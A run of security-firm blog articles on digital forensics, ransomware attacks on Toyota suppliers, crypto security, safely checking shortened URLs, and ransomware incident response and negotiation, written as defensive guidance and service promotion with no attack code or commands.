Data collections should be done without damaging the original systems, meticulously following established procedures and ensuring data integrity. Different data acquisition methods and tools may be used for different systems. Analysis should be conducted on the acquired copy or duplicate image rather than the original point of breach to allow for evidence corroboration.
The process of preserving data is key to ensure all information available is authentic and valid. Fundamental documentation of the evidence collected should include information on the date and time of collection (When), description of the evidence itself (What), information of the source system such as the operating system (Where), software or hardware specifications, and network identifier, and details of the acquisition tools used (How). There should also be established standards to properly store the data collected and prevent any evidence tampering.
Much like a physical crime scene, photos (or, in this case, digital copies) are taken of the evidence at the scene of the incident. Visuals of the scene are used as a point of reference for investigation. As incident responders often work in teams, these visuals enable parallel analysis among the multiple specialists. Digital copies are also highly useful for documenting the Incident Report following the investigation.
4. Analysis & Eradication
The primary goal of analysis is to determine how and when the breach happened by scrutinizing and interpreting the evidence collected. The analytical process draws on a multidisciplinary approach, pulling resources from various skillsets, expertise, and training. Approved tools and methodologies must be adhered to during this process.
Time and date parameters or boundaries are often the first two key factors identified as they are important in building the timeline of events that uncover how an attacker may have entered a system, moved within it, and taken actions on objectives. Time and date parameters also help investigators narrow the scope of an investigation, eliminate externalities and hypotheticals, and focus on the time range of the attack to more efficiently obtain useful findings.
Matching evidence to an event timeline may help identify corroborative evidence of the incident. Depending on the goals and priorities of the investigation, forensic investigators may interpret and draw conclusions based on facts gathered from the evidence.
As part of the threat eradication process, activities such as blocking malicious network indicators, rebuilding compromised systems, resetting account credentials and others should be taken with verification steps to follow so as to ensure a comprehensive remediation. A thorough exposure check or a vulnerability assessment of the entire system and continuous monitoring are advised to identify other weak links and potential threats. To prevent future occurrences, a new set of defenses may be proposed.
One important action that complements the steps above is copious note-taking. Documentation should be detailed enough such that actions taken can be replicated and reproduced by another person.
5. Reporting
The last step in this process is reporting. The report should identify the source of breach, techniques and methodology used to investigate and mitigate the attack, the evidence collected, and advisory materials for stakeholders and decision makers. The report should be factual, impartial, and non-technical for stakeholders to easily understand and take necessary action.
--
While each company or system is unique and requires its own incident response plan, the above-mentioned serves as a general overview of the investigation process involving digital forensics. For professional advice on incident response planning suited to your firm’s specific needs, schedule a call with one of Blackpanda’s cyber incident responders to plan your response.
Blackpanda incident response and digital forensics analysts continue to monitor a series of critical attacks against Japan's automotive industry. The Toyota Group ecosystem not only represents a core pillar of the global economy, but comprises nearly 60,000 companies across tier one through four partners. In early March 2022, the international group Denso, one of Toyota’s tier-1 providers, confirmed a ransomware attack against its core operations in Germany.
This attack was purportedly carried out by the Pandora group, which we believe might be a reincarnation of the Rook ransomware group listed Denso as a potential victim in 2021. This warning could be addressed with proper threat intelligence that monitors and alerts any time your domain is mentioned across the deep web. The criminal gang is now threatening to release 1.4 terabytes of critical information, including purchase orders, customer and corporate communications and intellectual property including designs and drawings. This comes just weeks after an attack on Kojima industries, another tier one supplier to Toyota.
During the five days that this purchase ordering system was out, Toyota had to close down 14 of its local production facilities. The attack also impacted the supply chain and operations of two other manufacturers. Although we cannot confirm at this point whether this is part of a coordinated campaign against the Toyota group, Blackpanda would encourage all manufacturers and suppliers in the region and across the automotive supply chain to continue monitoring their systems and remain vigilant.
This attack should serve as a reminder that critical data needs to be backed up and kept offline. In the event of a ransomware attack, you need to ensure that you have tested your backups for integrity, and that you can restore systems to operational efficiency.
We also encourage companies to seek out compromise assessment services, as these can help them assess whether their existing systems have been compromised. Additionally, we highly recommend that every business checks with their operating partners that the correct access controls and permissions are in place across these organisations.
If you believe that your organisation may be experiencing a cyber breach, contact Blackpanda immediately for prompt incident response.
Many of us in cyber security recall those early days spent musing or mining Bitcoins on deprecated servers as a way to save them from a lonely existence on a rack in the data center. It started as another form of tinkering, an experiment. But when I first heard of friends investing large sums into an actual marketplace of the stuff my reaction was as unintelligible as the ciphertext itself.
As with any technology that reaches critical mass, Blackpanda aims to address the security considerations top to bottom.
We believe that with great exposure comes great responsibility.
This series will introduce concepts related to security, privacy, and exploitability of blockchain technologies known as crypto.
What Is Crypto?
Crypto(graphy), as it applies to cyber security, always meant the concealment of data from prying eyes. In the modern dialect, “crypto” refers to a digital asset created and maintained by a distributed network of servers. Each crypto technology depends on the application of cryptography to authenticate transactions, establish the non-repudiation of the asset, which is how each unit derives value.
Overall cryptocurrency market capitalization per week from July 2010 to January 2022 (Statista, 2022)
What Is Cryptocurrency in Simple Words?
Think of our current financial systems. Currency typically circulates through a country or union of countries as coins and paper bills. One source of truth, the US Treasury or the European Central Bank, will regulate the flow and enforce standards, security, and a transparent accounting of the bills and coins. In reality, most currency today occurs in digital form–credit.
How Did Crypto Start?
Cryptocurrency first got popular in 2009 with Bitcoin being mentioned in a theoretical white paper published under a pseudonym. The author espoused the value of a peer-to-peer cash system.
We all know what became of this once-obscure proclamation. There are now close to 8,000 cryptocurrencies in circulation across the globe, with a total market capitalization that topped USD 3 trillion in November of 2021. This is because the anonymous alternative to cash appealed to both criminals and common consumers, which resulted in mainstream adoption.
Is Crypto Considered a Security?
This is a commonly asked question and, while it may seem like a leap to go from a trendy financial innovation to foundational economic tools, it is important that we address it.
Aside from data protection, it is important to clarify another definition of security. Financial securities, like equities or bonds, are “instruments” that represent monetary value and facilitate exchange. You can trade securities just like you can trade a dollar for four quarters to make change for the parking meter (another analog technology replaced by digital payments, by the way). While you might think of cryptocurrencies as securities, they are traded on consumer platforms much like regular equity or foreign currency, the SEC has yet to classify or regulate Bitcoin or Ethereum as such.
Certainly a topical tangent worthy of additional reading, but it boils down to crypto’s value to investors and whether or not there is an expectation of profit.
Financial institutions and formal boundaries exist for traditional securities. Many conflate the definition of a traditional security for the mathematically proven asset that is a unit of cryptocurrency. Both have financial importance to individuals. Yet given how unmonitored these currencies are for their worth, Blackpanda continues to track the threat actors targeting both developers and individuals as part of our mandate to assist those in the event of an attack.
Why Is Cyber Security an Important Consideration for Crypto Currencies?
The same way we expect a degree of reliability from traditional financial systems, we need the technology companies that run cryptocurrency platforms to win our trust as well. Though they take a completely different position on where or how that regulation happens, both crypto and traditional systems aim to prevent fraud, counterfeit, and theft.
Crypto systems opt for decentralized control. Each technology designs its own transparent method of authentication and verification at each stage of the blockchain. Meaning that for each operation performed on the ledger there is proof of the computation and action attributed to the individual performing it that is visible to all. This establishes security through the many eyes principle. This idea holds that the more visible something is, the more likely you are to find flaws. Collectively, this principle can improve the accuracy and quality of anything from data to open source software.
— —
In this series, we will focus on security as a theme across blockchain technology and its many applications. We will address attack vectors and predictions that will challenge the technology firms and exchanges powering crypto. We will also take the perspective of what security looks like to you, the crypto investor or consumer.
Shortened URLs are great for taking long, alpha-numeric character-heavy links and converting them into short and concise alternatives – perfect for reducing character count on things like social media or minimizing eye soreness in emails and other messages.
But when you click one of these shortened URLs, do you really know what lies on the other side? And how can you be certain that destination is friendly, and not laden with malicious intent?
In this article, we will cover common misuses of shortened URLs and some practical tips for investigating them.
Purposes for short URLs
Many programs use URLs to carry session information (such as where the link is being used or where the user is coming from). The result of including all this “extra” information is often a URL that stands hundreds of characters long. For this reason, short URLs have become a convenient way for providers to publish content.
In addition to being convenient, URL shortening services can also provide useful statistics on the number of clicks a link receives, when, and from where.
If you are active on Twitter or LinkedIn, then you may already be using URL shortening without realizing it. Twitter shortens its own links automatically using the t.co domain, while LinkedIn shortens links used on the platform to avoid unsightly long links taking up the space of meaningful text. You may also notice when you share YouTube videos the provided share link is for the YouTube domain, another example of automatic shortening.
Misuse of short URLs
A common technique used in phishing campaigns is obfuscating a malicious link, tricking the user into clicking what would otherwise be an easy-to-spot phishing attempt. One of the methods used to disguise these links is through a URL shortening service.
A URL shortening service takes a long link provided by a user and creates a shortened version, and a mapping between the two is maintained in an internal database. An example of a shortened URL is https://bit.ly/3eQsUNw, which when accessed redirects the user to the long URL https://www.blackpanda.com/post/17-july-2020-asia-cyber-summary.
The user is then able to access the long URL by visiting the short URL, making the link much easier to share across various mediums.
Passive intelligence collection from link providers
There are many popular URL shortening services available, and each offers their own way to investigate the original long link being shortened.
First is Bitly. By adding a + symbol at the end of the shortened URL we can identify the following features. Another is TinyURL. We don’t get much information from this provider, but if you go to preview.tinyurl.com/[ID], you can identify the long link without navigating to the page.
Another service, Tiny.cc, only provides shortened URLs for whitelisted domains. If you add the tilde symbol (~) at the end of the link you can see the number of clicks over time. However, we cannot confirm that ‘clicks over time’ are accurate or updated regularly.
Bit.do provides an absolute wealth of information as shown below. Just add the ‘-’ (hyphen) symbol to the end of the URL to view the following display:
Lastly, the provider is.gd also requires users add a ‘-’ to the end of the link in order to view the long link without navigating to it.
Conclusion
Utilizing the above methods provides additional intelligence into an indicator used in an attack, without navigating to the attacker’s infrastructure. This is known as passive intelligence gathering and is a critical technique if you do not want to tip off the attacker.
Letting an attacker know that you are investigating them can lead to destructive attacks being deployed and infrastructure burned in order to cover their tracks. When this occurs, the blue team is put at a disadvantage as they no longer have the element of surprise and now do not know where this adversary is coming from. Before using active methods ask the question: “Have I gathered enough information to detect the adversary if they change infrastructure?”
Cyber threats are continuously developing, and with them, the cyber security industry. Cyber security providers offer a variety of products and services to support the strengthening of organizations’ cyber security posture, legal due diligence exercises, and cyber incident response, to name a few.
While you may find similar services under a variety of names, cyber security services can be boiled down to a few select categories. At Blackpanda, we like to classify them between consulting, risk management, and incident response.
To help you navigate through the complex array of cyber security services available on the market, we have compiled a simplified cyber security services list so that you may better understand your options.
Cyber security consulting services
What is cyber defense consulting?
Cyber Defense Consulting is carried out by specialist consulting firms. A team of dedicated specialists will work with your organization to identify and develop the core competencies necessary for a robust security program in your unique environment, in such a manner that aligns security and business objectives. This type of service is usually recommended for medium to large sized enterprises who need to develop a corporate cyber security strategy, whilst smaller organizations can benefit more from cyber security planning services and tabletop exercises.
What are security planning and tabletop exercises?
A cyber security plan specifies the security policies, procedures, and controls required to protect an organization against threats and risk.
A cyber security plan can also outline the specific steps to take to respond to a breach. Such a plan, covering key steps in incident response, must be put in place to guide cyber incident handling, mitigating attacks and recovery. This plan must follow the SANS Institute and NIST prescribed processes for a methodical and more organized approach.
Much like fire drills, cyber security is a business process that should be actively and regularly practiced such that it becomes second nature even during high-pressure situations. This is where tabletop exercises can come in handy by ensuring that your organization knows exactly what to do in case of a cyber attack. If your organization is interested in building a cyber security plan, companies such as Blackpanda offer cyber security planning and tabletop exercise services.
What is security training?
Cyber security training, also known as Security Awareness Training, should be a priority for organizations of all sizes. This type of service helps educate employees to understand existing and emerging cyber security concerns.
Cyber security training encourages employees to understand cyber security issues, identify security risks such as phishing and ransomware, practice good cyber hygiene, and learn the importance of cyber security at an organizational level.
Blackpanda specializes in Digital Forensics and Incident Response (DFIR), a field within cyber security that focuses on the identification, investigation, and remediation of cyber attacks.
Although both digital forensics and incident response are typically employed in conjunction when responding to a cyber breach, each discipline has a specific use case that is vital to the work we do at Blackpanda.
While incident response tackles the immediate requirements of breach response (learn more about Incident Response here), digital forensics enables Blackpanda specialists to piece through the aftermath of an attack in order to better understand how the breach happened in the first place.
To better delineate this contrast, this article provides a brief overview of what digital forensics is and answers frequently asked questions about our favorite set of investigative cyber techniques.
What is digital forensics?
Digital forensics is the process of uncovering and interpreting electronic data from digital devices. Data collected from these devices help identify and preserve evidentiary materials in an organization’s digital infrastructure, and can be very important in an investigation relating to a cyber attack.
Digital forensics practices include:
File System Forensics - whereby file systems within the endpoint are analyzed for signs of compromise
Memory Forensics - whereby the computer memory is analyzed for attack indicators that may not appear within the file system
Network Forensics - whereby network activity -including emailing, messaging and web browsing- is reviewed to identify an attack, understand the cyber criminal’s attack techniques and gauge the scope of the incident
Log Analysis - whereby activity records or logs are reviewed and interpreted to identify suspicious activity or anomalous events
On top of this, analysis from the digital forensics team can help shape and strengthen preventative security measures, such as with compromise assessments. This can enable the organization to reduce overall risk, as well as speed future response times.
The history of digital forensics takes root in physical investigations carried out by the police and secret services, whereby digital forensics originated as a tool for data recovery and evolved into a critical capability for law enforcement as well as criminal and civil proceedings. It is one of many capabilities employed by advanced incident responders, serving as a critical tool to investigate cyber crime.
How is digital forensics different from cyber security?
As cyber security continues to grow in awareness and understanding among the general public, terms such as cyber security and digital forensics have often been used loosely, without a clear distinction. They are however different concepts with digital forensics being only one part of the activities practiced in the world of cyber security. In particular, digital forensics focuses on the reactive component of cyber security, supporting the incident response process in reconstructing the chain of events that lead to a breach, as well as to understand the source of the attack and recover compromised data. On the other hand, preventive cyber security activities and tools include Endpoint Detection and Response (EDR), Vulnerability Assessments & Penetration Testing, and Compromise Assessments, to name a few.
How is digital forensics used in incident response?
By using their proficiency in computer networking and applying a thorough understanding of the factors that lead to compromised systems, cyber security incident responders can provide invaluable support in times of crisis. Acting as watchdogs and first responders against cyber crimes, these specialists apply digital forensics standards to collect, process, preserve, and analyze the digital evidence of a compromised system, looking for footprints and signatures left behind by cyber criminals.
While each case presents its own set of challenges, incident responders are able to identify, compile, and interpret large volumes of electronic data, largely through digital forensic techniques.
Additionally, the use of digital forensics assists in the recovery of lost or stolen data as part of cyber incident response efforts following a breach.
Upon being tasked to conduct incident response procedures on an endpoint or network, a digital forensics specialist will start by conducting data and security breach investigations. They will then attempt to recover and examine data from computers and electronic storage devices, as well as dismantle and rebuild damaged systems to retrieve lost data. As a last step, specialists will work to identify additional systems compromised by cyberattacks and finally begin the compilation of evidence for relevant legal cases. The end goal for a digital forensics investigator is to recover as much lost data as possible, identify the perpetrator of a cyber crime, and obtain hard evidence against them so that it can be used in a court of law.
Digital forensic practitioners are skilled in identifying and working to retrieve data that is intentionally hidden, password-protected or encrypted, while ensuring that data is not damaged or altered during the examination. Concepts such as Rules of Evidence, Chain of Custody, and Data Integrity (to name a few) are commonly used by professional digital forensic practitioners.
Is digital forensics reliable?
Digital forensics is a discipline that provides decision-makers with factual and reliable evidence of digital traces on any device under investigation. It is a collection of techniques that have been used in civil, corporate, law enforcement, and military applications globally.
Digital forensic practitioners should be highly trained and experienced, as they must be able to attest that steps taken during the digital forensic investigation adhere to one or more regulatory frameworks and have produced the most reliable evidence given the available data, making it admissible in a court of law. Digital forensic practitioners that have their evidence examined in court are ultimately accepted as subject matter experts in certain jurisdictions.
However, investigative results and human interpretations depend on transparent access to client information as well as the proper use of specialist tools and applications designed to interpret and generate digital data. Tools may be used improperly by untrained responders, leading to faulty investigative conclusions. Where client data is limited (whether by lack of pre-breach preparation or unwillingness to disclose), investigative results may also be limited.
Critical to improving the reliability of investigative results depends on sufficient pre-breach incident response planning, including security event monitoring and logging, as well as ensuring your incident response team uses high-quality tools in which they are both properly trained and experienced.
How Is Digital Forensics Used in a Business Setting?
Cyber threats are no longer solely external. The rise of phishing emails, inadvertent data leaks, and malicious insider threats remains a top concern of IT leaders across the globe, accentuating the need for accurate and efficient digital forensic investigations supported by a comprehensive cyber incident response plan.
The protection of Personally Identifiable Information (PII) is another aspect of business that requires vigilance as it includes financial and legal repercussions, often requiring highly valuable digital forensic evidence in a court of law.
As more companies turn to digital forensics experts to investigate their digital infrastructure following a breach or compromise, valuable insights into a company’s digital vulnerabilities are usually identified, which can then be acted upon to secure the enterprise.
— —
We hope these answers and insights have served as a helpful start to learning more about one of the many cyber security services a company like Blackpanda can offer your business. Blackpanda offers bespoke Digital Forensics and Incident Response services to organizations in the APAC region.
Our Digital Forensics specialists draw from decades of intelligence and military experience, employing effective and battle-tested approaches when dealing with cyber incidents. In the event that your organization suffers a cyber breach, or more simply, if you would like to assess your existing defences across your network, don’t hesitate to reach out to us via the contact form below or through our email hello@blackpanda.com.
Ransomware is a type of malware that targets an organisation’s data. Attackers use it to hold valuable information hostage through encryption, requiring a ransom payment for it to be restored. Ransomware affects millions of businesses globally and is currently growing at unprecedented rates — both in terms of the likelihood of a ransomware attack against your organisation and of the average ransom amount requested. Ransomware is often designed to spread across a network and target database and file servers, and can thus quickly paralyse an entire organisation.
The motivation behind ransomware attacks is primarily economic, as companies are often willing to pay millions of dollars to the attackers in order to have their files unlocked, systems restored, and business operations resumed smoothly.
With cybercriminals continuously upgrading their malware and with their strategies becoming increasingly sophisticated, attackers are developing resources to conduct cyber attacks of enormous magnitude and impact.
Stay-at-home notices introduced during the COVID-19 pandemic have contributed to increased organisational cyber vulnerabilities with employees using personal devices connected to home or shared networks which are far less secure than organisational ones. Combined with bad cyber hygiene and a lack of general awareness of cyber best practices, organisations are truly at risk of a cyber breach.
Here we talk about everything you should know about ransomware incident response: how it works, its history, its workings and impact, as well as some major ransomware incidents and the cyber criminal gangs that were responsible for them, and how to respond to a ransomware attack.
History of Ransomware
While Ransomware has been making headlines for at least the past three years as a novel attack vector, the first recorded ransomware attack occurred almost thirty years ago. In 1989, a program dubbed “AIDS Trojan'' was distributed via floppy discs to unknowing attendees of a research conference. Believing the discs were research tools, these victims inserted the malware into their computers and watched their files become encrypted with the attackers demanding ransom by mail in exchange for instructions to decrypt their systems.
One of the biggest innovations that supported the explosion of ransomware was the emergence of cryptocurrencies such as Bitcoin’s rise in 2010. This provided an easy and untraceable method for receiving payment from victims which created the opportunity for ransomware to become a lucrative and low-risk undertaking.
With the growth of ransomware came developments in its supply-chain as cyber criminal groups began to offer Ransomware-as-a-Service packages whereby malware programs are leased to clients around the world in exchange for a portion of their profit from ransom payments.
Read about the Top 5 Ransomware Incidents in Asian History
The Largest Ransomware Attack in History
The biggest ransomware attack ever registered occurred in May 2021, when CNA Financial (“CNA”)—one of the largest insurance companies in the US—announced that it had been hit by a sophisticated and debilitating ransomware attack.
Whilst CNA declared that it did not lose access to any sensitive client data, over 15,000 company devices were encrypted and corporate networks were disrupted, forcing CNA to temporarily shut down its services.
CNA worked with private sector companies and US government agencies to secure its systems and contain the malware. To end the attack, CNA paid the attackers USD 40 million in Bitcoin – the largest recorded ransom payment ever – despite FBI guidelines discouraging companies from paying ransom demands, as payment strengthens attackers’ capabilities and increases the effectiveness of such attacks in the future.
The CNA Financial attack occurred within weeks of another ransomware incident hitting oil transportation company Colonial Pipeline, which paid USD 4.4 million to cyber criminals group DarkSide to stop the attack and release its data. These cases are not isolated, and they serve as high-visibility examples of a pervasive ransomware problem that affects organizations of all sizes across the globe.
Read about the CNA financial cyber attack.
Another ransomware gang that has been rising on the global cyber crime scene is eastern european group Indrik Spider, which is behind the recent DoppelPaymer attacks which affected community colleges, police, emergency services in the US, a German hospital, and Kia Motors, amongst others.
The DoppelPaymer ransomware strain is a relatively new and high-risk cyber threat. Being an evolved BitPaymer, it is able to encrypt entire networks within minutes from penetrating an endpoint. With large ransom demands and widespread targets, organisations in the APAC region should be on guard.
Everyone is at risk
The biggest misconception that exposes small and medium-sized enterprises to cyber attacks is the sense of “security through obscurity”. Start-Ups and SMEs tend to believe that they will never be targeted by cyber attacks because they are not important enough. This concept is no longer valid, as nowadays most hackers are looking to target the most vulnerable companies rather than the biggest ones.
Potential targets are identified by “hunter” bots that look for digital windows and doors left open or unlocked. This has meant that today, 43% of all cyber attacks are against SMEs, which lack structural preparedness and organisational cyber security awareness, but also the financial resilience needed to survive an attack.
Preparation is the key to survival. Educating employees on cyber best practices and ensuring that all systems are appropriately patched and protected is key to building resilience against cyber attacks. Further, having a well-rehearsed incident response plan and playbook allows for immediate response, such that in the event of a breach, response becomes an act of muscle memory.
Read about how Start-Ups and SMEs should develop their cyber security preparedness in order to maintain a confident attitude in the Asian and global markets and survive in an ever-changing cyber-threat panorama.
How to Respond to Ransomware
Whilst it is impossible to fully eliminate the risk of cyber attacks, steps can be taken to significantly reduce the chances that these may happen.
Aside from some simple steps that every organisation can take to improve their cyber security posture, it is important to have a good incident response plan to ensure that when risks occur, you know exactly what to do. At Blackpanda, we act like “cyber firefighters”, always on call and ready to roll out to compromised client systems just like firefighters do when a fire breaks out. We take this approach from our military origins, which inspire us to treat each cyber security matter in a similar light to a physical security one.
Here is a simple checklist of pre-breach, mid-breach and post-breach actions that you, in collaboration with a trusted digital forensics and incident response provider, can do to ensure that you are handling a cyber incident in the most secure and efficient way.
PRE-BREACH PREP
Use an EDR Service
Prepare an Incident Response Plan and Team
Purchase a Cyber Insurance Policy
ACTIVE BREACH RESPONSE
Disconnect or Shut Down Computing Devices
Contact a Trusted IR Team
Document All Significant Events and Actions
POST-BREACH MANAGEMENT
Deploy EDR Services
Regularly Patch and Update
Ensure Effective Backups Exist
Tighten Security Configurations
Have a Plan and Team in Place for Future Breaches
Ongoing Cyber Awareness Training for Employees
Insure Against Future Cyber Losses
– –
Ransomware is the biggest cyber threat organisations face today. Whilst good cyber hygiene and employee awareness is a good first step to reduce your company’s exposure to ransomware, the risk is still very high and cannot be eliminated.
The best way to build ransomware resilience is to have a good cyber incident response plan in place. Blackpanda’s planning consulting and table top exercise services help organisations develop the best cyber strategy for their particular industry and location.
To catch threats already in your networks before they can cause serious damage, carrying out frequent compromise assessments is essential, and in the event that you may already be experiencing a ransomware attack, Blackpanda is ready to intervene with tailored and APAC-focused incident response.
IR-1: The most effective cyber risk management solution for SMEs in Asia
Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.
Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.
Ransomware attacks have been on the rise, with the Asia Pacific region alone experiencing a 168% increase in ransomware incidents in 2021 compared to the previous year (Check Point Research, 2020). Not only are ransomware attacks becoming more common, but they are targeting organizations across all sectors and sizes, from large multinationals to Small-Medium Enterprises (SMEs) and startups.
Ransomware attackers target an organization’s data, holding it hostage through encryption and requiring payment for it to be restored. Ransomware affects millions of businesses globally and is currently growing at unprecedented rates — both in terms of the likelihood of a ransomware attack against your organization and of the average ransom amount requested.
With the average ransom demand averaging USD 180,000, hackers are always on the lookout for digital open doors. It is crucial for organizations of all sizes to be informed of the cyber risks they face and build resilience.
In this article, we look at how your company can protect itself from ransomware and what to do in the event that you experience an attack.
How to mitigate cyber risk
Whilst it is impossible to fully eliminate the risk of cyber attacks, steps can be taken to significantly reduce the chances that these may happen.
For example, keeping systems up-to-date is critical for ensuring the attacker has minimal opportunity to leverage vulnerabilities in your computing environment, and deploying Endpoint Detection and Response (EDR) services puts the highly specialized responsibility of monitoring for alerts or unwanted behaviour on the network into the hands of professional analysts backed by proven systems and procedures.
Additionally, companies should train their staff on how to spot and react to phishing attempts, which often lead to ransomware attacks, as this helps stop attackers at the front door and converts staff from being passive liabilities to active defenders.
Simple steps to protect your organization from ransomware
Pre-breach security is key in minimizing the chances that your company is compromised. This can be done through simple practices such as tightened security measures, full disk encryption, a strong password policy including multi-factor authentication (MFA), and the principle of least privilege.
Tightening security measures should be done by understanding and enabling the full range of security features already available in their computing environment. This can be done through a security settings monitor such as that included in Pandarecon™, which checks that endpoints across the company are appropriately set up to carry out their necessary actions, without leaving unnecessary open doors.
When it comes to platforms, passwords are the first line of protection against any unauthorized access to your personal computer. The stronger the password, the higher level of protection your computer has from malicious software and hackers.
Alongside full disk encryption, MFA is the most simple and effective way to confidently identify a user, protect their personal and organizational data, and prevent identity theft.
The primary benefit of MFA lies in enhancing your organization's security by requiring users to authenticate their identity with more than a username and password. While important, usernames and passwords are vulnerable to brute force attacks and can be stolen by third parties.
Additionally, companies should apply the principle of least privilege across all company platforms. This principle works by allowing only enough access to perform the required job. In an IT environment, adhering to the principle of least privilege reduces the risk of attackers gaining access to critical systems or sensitive data by compromising a low-level user account, device, or application. Implementing this principle helps contain compromises to their area of origin, stopping them from spreading to the system at large.
Finally, having a clear incident response (IR) plan, including a good cyber insurance policy which offers expert digital forensics and incident response (DFIR) services and management support in the event of a cyber attack, enables teams to react in a controlled and proven manner, saving precious time and resources following an attack.
Ransomware incident response
Step 1: Disconnect or shut down your computing devices
Should you suspect or know that you are under attack from ransomware, you can either disconnect or power down all devices on the network.
Disconnecting affected computing device(s) from the network will prevent the malware from spreading to or encrypting other devices in the network, thus limiting the potential damage, and maintaining the maximum amount of forensic data.
However, the ransomware will continue to encrypt files on infected devices. Powering down all devices stops the ransomware from encrypting further files, which can be vital for the organization’s continuation of business as usual but comes at the risk of losing forensic information. Do not switch on any further devices, as this will allow the ransomware to spread further.
It is crucial that you document everything that happens and all your actions from the moment you find out about an attack. You can do this by:
Taking extensive notes regarding information displayed on screen (photos and screenshots are preferable)
Key dates and times
Hostnames
Bitcoin accounts
Email addresses
All this information is used during the investigation to reconstruct the exact timeline of events, pinpoint the first known compromise, and track communications with the attackers.
Step 2: Contact your trusted IR team
The sooner IR specialists can intervene in a live crisis situation, the higher the chances of successfully defeating the attackers and recovering hostage data. IR specialists are trained to mitigate the effects of an incident in a timely and organized manner, including analysing the intrusion, containing the impact, investigating the root cause, and remediating the issue with maximum efficiency and minimal business interruption.
Upon being contacted, the IR team collects key information about the organization’s requirements, payment expectations, goals, and deadlines by which business operations must resume. Specialists then request information about the first known compromise and the exact timeline of events to support their digital forensics investigations.
As timely response is critical in the first hours of a ransomware attack, Blackpanda recommends IR planning to ensure all response terms are agreed upon prior to an incident. Such agreements are often best delivered either as part of a comprehensive cyber insurance policy (where IR planning can be acquired at a discount) or through a prepaid IR retainer if you do not qualify for insurance.
The ransomware defence process by IR specialists proceeds in two parallel streams to ensure the most rapid and effective response possible. On one side, the technical team works to secure the system and recover as many files as possible; on the other, crisis managers run ransom negotiations, aid in creating secure payment accounts, and ensure legal compliance.
Step 3A: Technical response
Blackpanda incident responders carry out a variety of highly complex procedures to contain and eradicate the malware. These include:
Network security
Running a trusted Anti-Virus tool, or Microsoft Windows Defender is only adequate for simple virus protection and firewalling; however, ransomware is an advanced threat with the ability to bypass these safeguards via a range of entry vectors (existing software vulnerability, email phishing, and more). To make up for this, you will require Endpoint Detection and Response (EDR) tools such as SentinelOne with the ability to perform a more advanced in-depth scan of your environment. Importantly, you should take this step on all computers in your enterprise. At this stage, IR specialists are able to provide guidance on what needs to happen next in terms of network segregation, physical device actions, and more.
Eradication and loss mitigation
Upon being notified of an attack, the IR team will work fast to quarantine the ransomware, recovering as much data and as many digital assets as possible. Next, they will also conduct digital forensics to attempt to reverse engineer the malware and continue their data recovery efforts. Our experienced ransomware specialists may also be able to identify and retrieve decryption keys from known ransomware databases to unlock data without resorting to paying the attackers.
Proof of life
The IR team will try to decrypt files independently, while taking steps to obtain a decryption key from the attackers. In 2020, 17% of ransom payers did not receive a working key to unlock encrypted data. For this reason, a crucial part of the IR team’s work is also to assess the authenticity of decryption keys provided by the attackers through verified “proof of life” exercises.
Recovery
The IR team will ensure that the network is secured while concurrently decrypting the files, in order to prevent the same or other attackers from exploiting any vulnerabilities and deploying another ransomware. Equipped with the correct key, IR specialists will help decrypt all data, restore system health, and ensure that the malware and its root cause are fully eradicated.
Step 3B: Crisis management
A crucial part of ransomware incident response is crisis management, which comprises all the financial, legal and PR aspects of cyber incident response. This includes:
Network security ransom negotiation
For some organizations, a ransomware payment is a business decision first and foremost. For others, a prompt IR is the best way to minimise the chances of having to pay a ransom, which can be seen as a last resort - only to be done if all efforts to decrypt the hostage files have been unsuccessful. In the eventuality that the IR team is unable to independently decrypt the data, they can help organizations facilitate the ransom negotiation process. Negotiation efforts serve to achieve improved outcomes and provide the time and intelligence necessary for organizational leadership to make informed decisions.
Attackers are also often not very responsive, as they may be conducting ransomware attacks on many organizations simultaneously. In these situations, IR specialists can help companies in successfully contacting the attackers and conducting negotiations.
Blackpanda IR specialists have a deep understanding of different ransomware tools and techniques, the actors and motives behind an attack, as well as the competencies of the attackers. During the negotiation process, all messages sent to the attackers by Blackpanda are carefully crafted to match the customer’s writing style and tone, whilst considering the attacker’s disposition, to help facilitate the best outcome.
Ransom payment facilitation
Once the negotiation has come to an accord, the IR team guides the organization through the payment of the ransom (if required and legal), setting up cryptocurrency payment accounts for the organization – which can be a lengthy and complicated process - and ensuring that all transactions are fully verified, transparent, secure, and auditable.
Organizations should also be aware that on 1st October 2020, the US Department of Treasury’s Office of Foreign Assets Control (OFAC) issued a globally enforceable advisory regarding ransom payments to sanctioned entities, with associated penalties of up to USD 1 million and 20 years in prison. Blackpanda fully supports an organization’s due diligence efforts throughout the decision-making process, working closely with international law enforcement partners such as the US Secret Service and the Singapore and Hong Kong Police Force to identify threat actors and sanctioned-entity status. Other governments are also contemplating mandatory reporting of ransom payments over certain amounts[1], rendering facilitation services your best option to obtain expert advice and ensuring you are not liable for any regulatory breaches should you choose to pay a ransom.
Reputational damage mitigation
Falling victim to a cyberattack can catastrophically damage an organization’s reputation. Attackers may threaten to publish sensitive information or company secrets, and press about the attack can cause clients to feel that their data is unsafe with the compromised organization and distrust it in the future. To mitigate reputational damage in the wake of a ransomware attack, it is vital that appropriate public relations activity is activated immediately.
The IR team at Blackpanda works with trusted partners who can promptly support organizations in communicating with media and press outlets. This way, the public will know that the compromised organization is responsibly conducting the appropriate procedures to protect their clients’ information.
Reporting and compliance
Depending on your specific industry, geography, and relevant regulations, you may be required to report the attack to authorities, shareholders, and/or customers. Your IR team should also maintain thorough documentation of the incident in compliance with insurance and other regulatory requirements (such as MAS Reporting Requirements), which can be a complicated and time-consuming process for organizations to conduct independently. Working with trusted people will help you through this particularly stressful phase; we ensure that you know who to involve and have them ready to react.
Protect yourself from future attacks
The IR team works as trusted advisors with partnered entities to ensure that your business has taken all necessary preventive measures to avoid the recurrence of this attack type. This includes the deployment of a Managed Detection and Response (MDR) system and the creation of backups that are disconnected from the live network. There are valuable lessons to be learned from each attack. Follow the 7 Steps listed below in Protect & Prevent and refer to the guides on the Blackpandawebsite to learn more.
– –
